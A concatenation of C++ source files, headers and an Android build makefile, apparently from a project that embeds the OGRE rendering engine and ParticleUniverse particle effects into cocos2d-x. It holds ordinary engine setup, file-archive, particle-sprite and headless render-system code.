//mRoot->installPlugin(new Ogre::GLES2Plugin());
mRoot->installPlugin(new Ogre::ParticleFXPlugin());
mRoot->installPlugin(new Ogre::BridgeRenderSystemPlugin());
mRoot->installPlugin(new ParticleUniverse::ParticleUniversePlugin());
Ogre::BridgeImageCodec::startup();
mRoot->addSceneManagerFactory(new Ogre::BridgeSceneManagerFactory());
Ogre::ArchiveManager::getSingleton().addArchiveFactory(new Ogre::BridgeFileSystemArchiveFactory());
mRoot->initialise();
// 设定 RenderSystem
mRenderSystem = mRoot->getRenderSystemByName("Bridge Rendering Subsystem");
mRoot->setRenderSystem(mRenderSystem);
/*mRoot->initialise(false);*/
mWindow = OGRE_NEW Ogre::BridgeWindow();
mSceneMgr = static_cast<Ogre::BridgeSceneManager*>(mRoot->createSceneManager(Ogre::ST_GENERIC, Ogre::BridgeSceneManagerFactory::FACTORY_TYPE_NAME));
//mSceneMgr->setViewport();
mCamera = mSceneMgr->createCamera("PlayerCam");
mCamera->lookAt(Ogre::Vector3(0,0,1));
mCamera->roll(Ogre::Degree(180));
//mCamera->yaw(Ogre::Degree(180));
mCamera->pitch(Ogre::Degree(180));
mViewport = OGRE_NEW Ogre::Viewport(mCamera, mWindow, 0, 0, 1280, 800, 0);
mViewport->setCamera(mCamera);
mViewport->setClearEveryFrame(false);
/*auto data = new Ogre::RenderTarget();
mViewport = OGRE_NEW Ogre::Viewport(mCamera, new Ogre::RenderTarget(), 0, 0, 1280, 800, 0);
mCamera->_notifyViewport(mViewport);
mViewport->setClearEveryFrame(false);
mViewport->setBackgroundColour(Ogre::ColourValue(255, 255, 255));
//设置屏幕的长宽比(视口的宽度和高度比,目前的宽屏电脑)
mCamera->setAspectRatio(Ogre::Real(mViewport->getActualWidth()) / Ogre::Real(mViewport->getActualHeight()));
*/
mCamera->setAspectRatio(Ogre::Real(mViewport->getActualWidth()) / Ogre::Real(mViewport->getActualHeight()));
mSceneMgr->initSceneManager(mViewport, mCamera, cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR));
Ogre::ResourceGroupManager::getSingleton()
.addResourceLocation("LocationGeneral", "BridgeFileSystem");
}
}
Ogre::Camera* OgreManager::getCamera(){ return mCamera;}
Ogre::RenderSystem* OgreManager::getRenderSystem(){ return mRenderSystem;}
Ogre::SceneManager* OgreManager::getSceneManager(){ return mSceneMgr;}
void OgreManager::purge()
{
if(mRoot)
{
delete mRoot;
mRoot = NULL;
}
}
ParticleUniverse::ParticleSystem* OgreManager::createParticleSystem(const std::string &typeName,const std::string &entityName)
{
ParticleUniverse::ParticleSystem * ret = NULL;
if (mSceneMgr)
{
ParticleUniverse::ParticleSystemManager*pManager = ParticleUniverse::ParticleSystemManager::getSingletonPtr();
if (pManager)
{
ret = pManager->createParticleSystem(entityName, typeName, mSceneMgr);
}
}
return ret;
}
void OgreManager::destroyParticleSystem(ParticleUniverse::ParticleSystem* particleSystem)
{
ParticleUniverse::ParticleSystem * ret = NULL;
if (mSceneMgr)
{
ParticleUniverse::ParticleSystemManager *pManager = ParticleUniverse::ParticleSystemManager::getSingletonPtr();
if (pManager)
{
pManager->destroyParticleSystem(particleSystem, mSceneMgr);
}
}
}
Ogre::Entity* OgreManager::createEntity(const std::string &fileName)
{
Ogre::Entity * ret = NULL;
if (mSceneMgr)
{
ret = mSceneMgr->createEntity(fileName);
}
return ret;
}
void OgreManager::destroyEntity(Ogre::Entity* entity)
{
if (mSceneMgr)
{
mSceneMgr->destroyEntity(entity);
}
}
void OgreManager::addResourceByName(const std::string &nameStr, const std::string &gropStr)
{
bool ret = false;
if (false == ret)
{
ret = addResourceForManager(nameStr, gropStr, Ogre::ScriptCompilerManager::getSingletonPtr());
}
if (false == ret)
{
ret = addResourceForManager(nameStr, gropStr, Ogre::FontManager::getSingletonPtr());
}
if (false == ret)
{
ret = addResourceForManager(nameStr, gropStr, Ogre::OverlayManager::getSingletonPtr());
}
}
void OgreManager::removeResourceByName(const std::string &name, const Ogre::String &grop)
{
Ogre::ResourceGroupManager::getSingleton().deleteResource(name,grop);
}
bool OgreManager::addResourceForManager(const std::string &name, const std::string &grop, Ogre::ScriptLoader * loader)
{
bool ret = false;
const Ogre::StringVector& patterns = loader->getScriptPatterns();
for (Ogre::StringVector::const_iterator p = patterns.begin(); p != patterns.end(); ++p)
{
Ogre::String temp(*p);
size_t pos1 = temp.find('*');
if (temp.npos != temp.find('*'))
{
temp = temp.substr(pos1 + 1);
}
if (name.npos != name.rfind(temp))
{
Ogre::DataStreamPtr dstream =
Ogre::ResourceGroupManager::getSingleton().openResource(
name, grop);
loader->parseScript(dstream, grop);
ret = true;
}
}
return ret;
}
NS_CC_END<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreStableHeaders.h"
#include "OgreLogManager.h"
#include "OgreException.h"
#include "OgreStringVector.h"
#include "OgreRoot.h"
#include "OgreBridgeFileSystemArchive.h"
#include "cocos2d.h"
namespace Ogre {
bool BridgeFileSystemArchive::msIgnoreHidden = true;
//-----------------------------------------------------------------------
BridgeFileSystemArchive::BridgeFileSystemArchive(const String& name, const String& archType)
: Archive(name, archType)
{
}
//-----------------------------------------------------------------------
bool BridgeFileSystemArchive::isCaseSensitive(void) const
{
#if OGRE_PLATFORM == OGRE_PLATFORM_WIN32
return false;
#else
return true;
#endif
}
//-----------------------------------------------------------------------
BridgeFileSystemArchive::~BridgeFileSystemArchive()
{
unload();
}
//-----------------------------------------------------------------------
void BridgeFileSystemArchive::load()
{
mReadOnly = false;
}
//-----------------------------------------------------------------------
void BridgeFileSystemArchive::unload()
{
// nothing to see here, move along
}
//-----------------------------------------------------------------------
DataStreamPtr BridgeFileSystemArchive::open(const String& filename, bool readOnly) const
{
cocos2d::Data data = cocos2d::FileUtils::getInstance()->getDataFromFile(filename);
MemoryDataStreamPtr streamPtr;
streamPtr.bind(new MemoryDataStream(data.getSize()));
uchar* pDst = streamPtr->getPtr();
memcpy(pDst, data.getBytes(), data.getSize());
return DataStreamPtr(streamPtr);
}
//---------------------------------------------------------------------
DataStreamPtr BridgeFileSystemArchive::create(const String& filename) const
{
/*if (isReadOnly())
{
OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
"Cannot create a file in a read-only archive",
"FileSystemArchive::remove");
}
String full_path = cocos2d::FileUtils::getInstance()->fullPathForFilename(filename);
// Always open in binary mode
// Also, always include reading
std::ios::openmode mode = std::ios::out | std::ios::binary;
std::fstream* rwStream = OGRE_NEW_T(std::fstream, MEMCATEGORY_GENERAL)();
rwStream->open(full_path.c_str(), mode);
// Should check ensure open succeeded, in case fail for some reason.
if (rwStream->fail())
{
OGRE_DELETE_T(rwStream, basic_fstream, MEMCATEGORY_GENERAL);
OGRE_EXCEPT(Exception::ERR_FILE_NOT_FOUND,
"Cannot open file: " + filename,
"FileSystemArchive::create");
}
/// Construct return stream, tell it to delete on destroy
FileStreamDataStream* stream = OGRE_NEW FileStreamDataStream(filename,
rwStream, 0, true);
*/
return DataStreamPtr();
}
//---------------------------------------------------------------------
void BridgeFileSystemArchive::remove(const String& filename) const
{
OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
"Cannot remove a file from a read-only archive",
"BridgeFileSystemArchive::remove");
}
//-----------------------------------------------------------------------
StringVectorPtr BridgeFileSystemArchive::list(bool recursive, bool dirs)
{
// directory change requires locking due to saved returns
// Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
StringVectorPtr ret(OGRE_NEW_T(StringVector, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
//findFiles("*", recursive, dirs, ret.getPointer(), 0);
return ret;
}
//-----------------------------------------------------------------------
FileInfoListPtr BridgeFileSystemArchive::listFileInfo(bool recursive, bool dirs)
{
// Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
FileInfoListPtr ret(OGRE_NEW_T(FileInfoList, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
return ret;
}
//-----------------------------------------------------------------------
StringVectorPtr BridgeFileSystemArchive::find(const String& pattern,
bool recursive, bool dirs)
{
// Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
StringVectorPtr ret(OGRE_NEW_T(StringVector, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
return ret;
}
//-----------------------------------------------------------------------
FileInfoListPtr BridgeFileSystemArchive::findFileInfo(const String& pattern,
bool recursive, bool dirs) const
{
// Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
FileInfoListPtr ret(OGRE_NEW_T(FileInfoList, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
return ret;
}
//-----------------------------------------------------------------------
bool BridgeFileSystemArchive::exists(const String& filename)
{
return cocos2d::FileUtils::getInstance()->isFileExist(filename);
}
//---------------------------------------------------------------------
time_t BridgeFileSystemArchive::getModifiedTime(const String& filename)
{
return 0;
}
//-----------------------------------------------------------------------
const String& BridgeFileSystemArchiveFactory::getType(void) const
{
static String name = "BridgeFileSystem";
return name;
}
}
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCParticleSprite3D_H__
#define __CCParticleSprite3D_H__
#include "cocos2d.h"
#include "OgreOgreSprite3D.h"
#include <ParticleUniverseCommon.h>
#include <ParticleUniverseSystemListener.h>
namespace ParticleUniverse
{
class ParticleSystem;
}
NS_CC_BEGIN
/** particle univeise system */
class ParticleSprite3D :
public OgreSprite3D,
public ParticleUniverse::ParticleSystemListener
{
public:
void showParticle();
void stopParticle();
void autoRemoveSelf();
void setKeepLocal(bool isLocal);
static ParticleSprite3D* create(const std::string &typeName);
void setDynamicAttribute(const std::string &attributeName,float value){}
virtual void handleParticleSystemEvent(ParticleUniverse::ParticleSystem* particleSystem, ParticleUniverse::ParticleUniverseEvent& particleUniverseEvent) override;
virtual void updateParentTransform(const Mat4& parentTransform);
CC_CONSTRUCTOR_ACCESS:
ParticleSprite3D();
virtual ~ParticleSprite3D();
bool initWithFile( const std::string &typeName);
virtual void update(float delta) override;
protected:
enum StateType
{
PARTICLE_NONE,
PARTICLE_STARTING,
PARTICLE_STOPPING
};
bool mIsRunning;
StateType mStateType;
bool mParticleStateDirty;
bool mIsStartParticle;
bool mIsAutoRemoveSelf;
ParticleUniverse::ParticleSystem *mParticleSystem;
};
NS_CC_END
#endif // __ParticleSprite3D_H_
<file_sep>
/* Copyright 2013 <NAME> / <EMAIL>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "OgreBridgeRenderSystem.h"
#include "components/OgreBridgeBufferManager.h"
#include "components/OgreBridgeTextureManager.h"
#include "components/OgreBridgeGpuProgramManager.h"
namespace Ogre
{
BridgeRenderSystem::BridgeRenderSystem() :
RenderSystem(),
mTextureManager(0),
mHardwareBufferManager(0)
{
LogManager::getSingleton().logMessage("BridgeRenderSystem ctor", Ogre::LML_TRIVIAL);
reinitialise();
}
BridgeRenderSystem::~BridgeRenderSystem()
{
LogManager::getSingleton().logMessage("BridgeRenderSystem dtor", Ogre::LML_TRIVIAL);
shutdown();
}
const String& BridgeRenderSystem::getName(void) const
{
static String renderSystemName("Bridge Rendering Subsystem");
return renderSystemName;
}
RenderWindow* BridgeRenderSystem::_initialise(bool autoCreateWindow, const String& windowTitle)
{
OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
String("BridgeRenderSystem cannot be initialized. This indicates Ogre::Root::initialize() was called and you are about to create a rendering window. ") +
String("This rendering plugin is for headless operation only."),
"BridgeRenderSystem::_initialise");
return 0;
}
void BridgeRenderSystem::reinitialise()
{
LogManager::getSingleton().logMessage("BridgeRenderSystem::reinitialise", Ogre::LML_TRIVIAL);
shutdown();
mTextureManager = OGRE_NEW BridgeHardwareTextureManager();
mHardwareBufferManager = OGRE_NEW BridgeHardwareBufferManager();
mRealCapabilities = createRenderSystemCapabilities();
if (!mUseCustomCapabilities)
mCurrentCapabilities = mRealCapabilities;
mGpuProgramManager = OGRE_NEW BridgeGpuProgramManager();
}
void BridgeRenderSystem::shutdown(void)
{
if (!mTextureManager && !mHardwareBufferManager)
return;
LogManager::getSingleton().logMessage("BridgeRenderSystem::shutdown", Ogre::LML_TRIVIAL);
if (mTextureManager)
OGRE_DELETE mTextureManager;
mTextureManager = 0;
if (mHardwareBufferManager)
OGRE_DELETE mHardwareBufferManager;
mHardwareBufferManager = 0;
if (mGpuProgramManager)
OGRE_DELETE mGpuProgramManager;
mGpuProgramManager = 0;
}
RenderSystemCapabilities* BridgeRenderSystem::createRenderSystemCapabilities() const
{
RenderSystemCapabilities* rsc = OGRE_NEW RenderSystemCapabilities();
rsc->setCategoryRelevant(CAPS_CATEGORY_GL, true);
rsc->setDriverVersion(mDriverVersion);
/*const char* deviceName = (const char*)glGetString(GL_RENDERER);
const char* vendorName = (const char*)glGetString(GL_VENDOR);
if (deviceName)
{
rsc->setDeviceName(deviceName);
}*/
rsc->setRenderSystemName(getName());
// Determine vendor
/*if (strstr(vendorName, "Imagination Technologies"))
rsc->setVendor(GPU_IMAGINATION_TECHNOLOGIES);
else if (strstr(vendorName, "Apple Computer, Inc."))
rsc->setVendor(GPU_APPLE); // iOS Simulator
else if (strstr(vendorName, "NVIDIA"))
rsc->setVendor(GPU_NVIDIA);
else
rsc->setVendor(GPU_UNKNOWN);*/
// Multitexturing support and set number of texture units
GLint units;
glGetIntegerv(GL_MAX_TEXTURE_IMAGE_UNITS, &units);
rsc->setNumTextureUnits(units);
// Check for hardware stencil support and set bit depth
GLint stencil;
glGetIntegerv(GL_STENCIL_BITS, &stencil);
//CHECK_GL_ERROR_DEBUG();
if(stencil)
{
rsc->setCapability(RSC_HWSTENCIL);
rsc->setCapability(RSC_TWO_SIDED_STENCIL);
rsc->setStencilBufferBitDepth(stencil);
}
// Scissor test is standard
rsc->setCapability(RSC_SCISSOR_TEST);
// Vertex Buffer Objects are always supported by OpenGL ES
rsc->setCapability(RSC_VBO);
rsc->setCapability(RSC_FBO);
rsc->setCapability(RSC_HWRENDER_TO_TEXTURE);
rsc->setNumMultiRenderTargets(1);
// Cube map
rsc->setCapability(RSC_CUBEMAPPING);
// Stencil wrapping
rsc->setCapability(RSC_STENCIL_WRAP);
// GL always shares vertex and fragment texture units (for now?)
rsc->setVertexTextureUnitsShared(true);
// Hardware support mipmapping
rsc->setCapability(RSC_AUTOMIPMAP);
// Blending support
rsc->setCapability(RSC_BLENDING);
rsc->setCapability(RSC_ADVANCED_BLEND_OPERATIONS);
// DOT3 support is standard
rsc->setCapability(RSC_DOT3);
// Point size
GLfloat psRange[2] = {0.0, 0.0};
glGetFloatv(GL_ALIASED_POINT_SIZE_RANGE, psRange);
CHECK_GL_ERROR_DEBUG();
rsc->setMaxPointSize(psRange[1]);
// Point sprites
rsc->setCapability(RSC_POINT_SPRITES);
rsc->setCapability(RSC_POINT_EXTENDED_PARAMETERS);
// GLSL ES is always supported in GL ES 2
rsc->addShaderProfile("glsles");
LogManager::getSingleton().logMessage("GLSL ES support detected");
#if !OGRE_NO_GLES2_CG_SUPPORT
rsc->addShaderProfile("cg");
rsc->addShaderProfile("ps_2_0");
rsc->addShaderProfile("vs_2_0");
#endif
// UBYTE4 always supported
rsc->setCapability(RSC_VERTEX_FORMAT_UBYTE4);
// Infinite far plane always supported
rsc->setCapability(RSC_INFINITE_FAR_PLANE);
// Vertex/Fragment Programs
rsc->setCapability(RSC_VERTEX_PROGRAM);
rsc->setCapability(RSC_FRAGMENT_PROGRAM);
#if OGRE_NO_GLES2_GLSL_SUPPORT == 0
GLfloat floatConstantCount = 0;
glGetFloatv(GL_MAX_VERTEX_UNIFORM_VECTORS, &floatConstantCount);
rsc->setVertexProgramConstantFloatCount((Ogre::ushort)floatConstantCount);
rsc->setVertexProgramConstantBoolCount((Ogre::ushort)floatConstantCount);
rsc->setVertexProgramConstantIntCount((Ogre::ushort)floatConstantCount);
// Fragment Program Properties
floatConstantCount = 0;
glGetFloatv(GL_MAX_FRAGMENT_UNIFORM_VECTORS, &floatConstantCount);
rsc->setFragmentProgramConstantFloatCount((Ogre::ushort)floatConstantCount);
rsc->setFragmentProgramConstantBoolCount((Ogre::ushort)floatConstantCount);
rsc->setFragmentProgramConstantIntCount((Ogre::ushort)floatConstantCount);
#endif
// Geometry programs are not supported, report 0
rsc->setGeometryProgramConstantFloatCount(0);
rsc->setGeometryProgramConstantBoolCount(0);
rsc->setGeometryProgramConstantIntCount(0);
// Check for Float textures
#if GL_OES_texture_float || GL_OES_texture_half_float
rsc->setCapability(RSC_TEXTURE_FLOAT);
#endif
// Alpha to coverage always 'supported' when MSAA is available
// although card may ignore it if it doesn't specifically support A2C
rsc->setCapability(RSC_ALPHA_TO_COVERAGE);
// No point sprites, so no size
rsc->setMaxPointSize(0.f);
return rsc;
}
ConfigOptionMap& BridgeRenderSystem::getConfigOptions(void)
{
return mHeadlessOptions;
}
RenderWindow* BridgeRenderSystem::_createRenderWindow(const String &name, unsigned int width, unsigned int height, bool fullScreen, const NameValuePairList *miscParams)
{
OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
"BridgeRenderSystem cannot create rendering windows. This rendering plugin is for headless operation only.",
"BridgeRenderSystem::_createRenderWindow");
return 0;
}
bool BridgeRenderSystem::_createRenderWindows(const RenderWindowDescriptionList& renderWindowDescriptions, RenderWindowList& createdWindows)
{
OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
"BridgeRenderSystem cannot create rendering windows. This rendering plugin is for headless operation only.",
"BridgeRenderSystem::_createRenderWindows");
return false;
}
}
<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := rendersystem_static
LOCAL_MODULE_FILENAME := librendersystem
# ogre_rendersystem
LOCAL_OGRE_RENDER_GLES_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/common
LOCAL_OGRE_RENDER_GLES_SRC_FILES := \
src/common/OgreCommonGLContext.cpp \
src/common/OgreCommonGLSupport.cpp \
src/common/OgreCommonWindow.cpp \
src/OgreGLES2Context.cpp \
src/OgreGLES2DefaultHardwareBufferManager.cpp \
src/OgreGLES2DepthBuffer.cpp \
src/OgreGLES2EngineDll.cpp \
src/OgreGLES2FBOMultiRenderTarget.cpp \
src/OgreGLES2FBORenderTexture.cpp \
src/OgreGLES2FrameBufferObject.cpp \
src/OgreGLES2GpuProgram.cpp \
src/OgreGLES2GpuProgramManager.cpp \
src/OgreGLES2HardwareBufferManager.cpp \
src/OgreGLES2HardwareIndexBuffer.cpp \
src/OgreGLES2HardwareOcclusionQuery.cpp \
src/OgreGLES2HardwarePixelBuffer.cpp \
src/OgreGLES2HardwareVertexBuffer.cpp \
src/OgreGLES2PixelFormat.cpp \
src/OgreGLES2Plugin.cpp \
src/OgreGLES2RenderSystem.cpp \
src/OgreGLES2RenderTexture.cpp \
src/OgreGLES2Support.cpp \
src/OgreGLES2Texture.cpp \
src/OgreGLES2TextureManager.cpp
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include/common
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_RENDER_GLES_INCLUDE)
LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_RENDER_GLES_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main)<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "OgreParticleSprite3D.h"
#include "OgreOgreManager.h"
#include "OgreNodeProtocol.h"
#include <ParticleUniverseSystemManager.h>
NS_CC_BEGIN
ParticleSprite3D* ParticleSprite3D::create(const std::string &typeName)
{
auto node = new ParticleSprite3D();
if (node && node->initWithFile(typeName))
{
node->autorelease();
return node;
}
CC_SAFE_DELETE(node);
return nullptr;
}
ParticleSprite3D::ParticleSprite3D() :
mIsRunning(false),
mParticleSystem(NULL),
mIsAutoRemoveSelf(false),
mStateType(PARTICLE_NONE),
mParticleStateDirty(false)
{
}
ParticleSprite3D::~ParticleSprite3D()
{
if (mParticleSystem)
{
this->detachObject(mParticleSystem);
mParticleSystem->removeParticleSystemListener(this);
OgreManager::getInstance()->destroyParticleSystem(mParticleSystem);
mParticleSystem = NULL;
}
}
bool ParticleSprite3D::initWithFile(const std::string &typeName)
{
std::stringstream ss;
ss << this;
std::string name = "ParticleSprite3D" + ss.str();
mParticleSystem = OgreManager::getInstance()->createParticleSystem(typeName,name);
if (OgreSprite3D::init() && mParticleSystem)
{
scheduleUpdate();
this->attachObject(mParticleSystem);
mParticleSystem->setUseController(false);
mParticleSystem->setBoundsAutoUpdated(false);
mParticleSystem->addParticleSystemListener(this);
return true;
}
return false;
}
void ParticleSprite3D::showParticle()
{
mIsStartParticle = true;
}
void ParticleSprite3D::stopParticle()
{
mParticleSystem->stopFade();
}
void ParticleSprite3D::autoRemoveSelf()
{
mIsAutoRemoveSelf = true;
}
void ParticleSprite3D::setKeepLocal(bool isLocal)
{
mParticleSystem->setKeepLocal(isLocal);
}
void ParticleSprite3D::updateParentTransform(const Mat4& parentTransform)
{
OgreSprite3D::updateParentTransform(parentTransform);
if (_nodeProtocol)
{
mParticleSystem->setScale(Ogre::Vector3(mCosScale.x,mCosScale.y,mCosScale.z));
mParticleSystem->setScaleVelocity(mCosScale.x);
mParticleSystem->_update(0);
}
}
void ParticleSprite3D::update(float delta)
{
if(mIsStartParticle)
{
mIsStartParticle = false;
mParticleSystem->start();
}
else
{
if(mIsRunning)
{
mParticleSystem->_update(delta);
}
if(mParticleStateDirty)
{
mParticleStateDirty = false;
switch(mStateType)
{
case PARTICLE_STARTING:
mIsRunning = true;
break;
case PARTICLE_STOPPING:
mIsRunning = false;
if(mIsAutoRemoveSelf) //cannot write any code after remove
{
this->removeFromParent();
}
break;
}
}
}
}
void ParticleSprite3D::handleParticleSystemEvent(ParticleUniverse::ParticleSystem* particleSystem, ParticleUniverse::ParticleUniverseEvent& particleUniverseEvent)
{
switch(particleUniverseEvent.eventType)
{
case ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTING:
mParticleStateDirty = true;
mStateType = StateType::PARTICLE_STARTING;
break;
case ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPING:
mParticleStateDirty = true;
mStateType = StateType::PARTICLE_STOPPING;
break;
}
/*
ParticleUniverse::EventType::PU_EVT_SYSTEM_ATTACHING, // Submit event when the particle system is being attached or detached.
ParticleUniverse::EventType::PU_EVT_SYSTEM_ATTACHED, // Submit event when the particle system is attached or detached.
ParticleUniverse::EventType::PU_EVT_SYSTEM_PREPARING, // Submit event when the particle system is preparing.
ParticleUniverse::EventType::PU_EVT_SYSTEM_PREPARED, // Submit event when the particle system is prepared.
ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTING, // Submit event when the particle system is starting.
ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTED, // Submit event when the particle system is started.
ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPING, // Submit event when the particle system is stopping.
ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPED, // Submit event when the particle system is stopped.
ParticleUniverse::EventType::PU_EVT_SYSTEM_PAUSING, // Submit event when the particle system is pausing.
ParticleUniverse::EventType::PU_EVT_SYSTEM_PAUSED, // Submit event when the particle system is paused.
ParticleUniverse::EventType::PU_EVT_SYSTEM_RESUMING, // Submit event when the particle system is resuming (after a pause).
ParticleUniverse::EventType::PU_EVT_SYSTEM_RESUMED, // Submit event when the particle system is resumed (after a pause).
ParticleUniverse::EventType::PU_EVT_SYSTEM_DELETING, // Submit event when the particle system is being deleted.
ParticleUniverse::EventType::PU_EVT_LOD_TRANSITION, // Submit event when the particle system switches to another technique when a LOD-level is exceeded.
ParticleUniverse::EventType::PU_EVT_EMITTER_STARTED, // Submit event when an emitter is started.
ParticleUniverse::EventType::PU_EVT_EMITTER_STOPPED, // Submit event when an emitter is stopped.
ParticleUniverse::EventType::PU_EVT_NO_PARTICLES_LEFT, // Submit event when all particles have been expired.*/
}
NS_CC_END<file_sep>#ifndef OGRE_APP_MGR_H
#define OGRE_APP_MGR_H
#include "cocos2d.h"
namespace Ogre
{
class Root;
class Entity;
class Camera;
class Viewport;
class RenderWindow;
class RenderSystem;
class BridgeSceneManager;
class ScriptLoader;
class MovableObject;
class SceneManager;
}
namespace ParticleUniverse
{
class ParticleSystem;
}
NS_CC_BEGIN
class OgreManager
{
public: //root
void initialize();
void purge();
ParticleUniverse::ParticleSystem* createParticleSystem(const std::string &typeName,const std::string &entityName);
void destroyParticleSystem(ParticleUniverse::ParticleSystem* particleSystem);
Ogre::Entity* createEntity(const std::string &fileName);
void destroyEntity(Ogre::Entity* entity);
void addResourceByName(const std::string &name, const std::string &grop = "General");
void removeResourceByName(const std::string &name, const std::string &grop = "General");
static OgreManager *getInstance();
Ogre::Camera* getCamera();
Ogre::RenderSystem* getRenderSystem();
Ogre::SceneManager* getSceneManager();
CC_CONSTRUCTOR_ACCESS:
OgreManager();
virtual ~OgreManager();
protected:
bool addResourceForManager(const std::string &, const std::string &, Ogre::ScriptLoader *);
Ogre::Root *mRoot;
Ogre::Camera* mCamera;
Ogre::Viewport* mViewport;
Ogre::RenderWindow* mWindow;
Ogre::RenderSystem *mRenderSystem;
Ogre::BridgeSceneManager *mSceneMgr;
};
NS_CC_END
#endif//OGREAPP_H
<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
